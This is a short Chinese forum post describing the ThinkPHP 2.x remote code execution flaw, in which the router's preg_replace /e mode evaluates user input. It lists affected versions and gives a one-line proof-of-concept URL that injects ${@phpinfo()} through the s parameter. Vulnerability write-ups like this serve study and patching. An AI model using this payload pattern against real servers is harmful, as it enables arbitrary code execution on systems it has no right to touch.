讨论社区  /   日志  /   帖子详情
Thinkphp 2.x rce
2023-03-29 23:03:03
204
{{single.collect_count}}

Thinkphp 2.x rce

Thinkphp简介

Thinkphp 是一个开源的,快速、简单的面向对象的轻量级PHP开发框架

漏洞影响版本

Thinkphp 2.x

漏洞概述

ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

漏洞复现

http://{{BaseUrl}}/index.php?s=/a/a/a/${@phpinfo()}

在这里插入图片描述

回帖
全部回帖({{commentCount}})
{{item.user.nickname}} {{item.user.group_title}} {{item.friend_time}}
{{item.content}}
{{item.comment_content_show ? '取消' : '回复'}} 删除
回帖
{{reply.user.nickname}} {{reply.user.group_title}} {{reply.friend_time}}
{{reply.content}}
{{reply.comment_content_show ? '取消' : '回复'}} 删除
回帖
收起
没有更多啦~
{{commentLoading ? '加载中...' : '查看更多评论'}}
发帖
加入PHP技术QQ群
一个专属于OneKeyAdmin的技术交流平台,记录OneKeyAdmin开发者的成长与进步。
主题帖
6221
回帖数
145
{{userInfo.nickname}} {{userInfo.group_title}}
{{userInfo.describe}}
文章
{{blog_count}}
回帖
{{blog_comment_count}}
收藏
{{blog_collect_count}}
登陆  /   注册
文章
-
评论
-
粉丝
-
热门帖子
1  WordPress Rest API 入门详解
3199
2  Yandex企业邮箱注册
3176
3  Thinkphp5.0 获取新增数据的ID
2911
4  thinkphp5 解决跨域问题
2492
5  Thinkphp6 的 where 查询条件 and 和 or 的 操作
2203
6  PHP的exec()函数用法详解
2121
7  Vue3官网使用及简介
1975
8  thinkphp6配置连接微软的sqlserver数据库
1928
9  Thinkphp如何查看当前是哪个版本?查看thinkphp当前版本号的三种方法
1874
10  thinkphp5使用数据库表锁
1831

Copyright © 2021-2024 onekeyadmin.com All rights reserved 温州市万旗信息科技有限公司 版权所有  网站备案/许可证号:浙ICP备2022028513号-1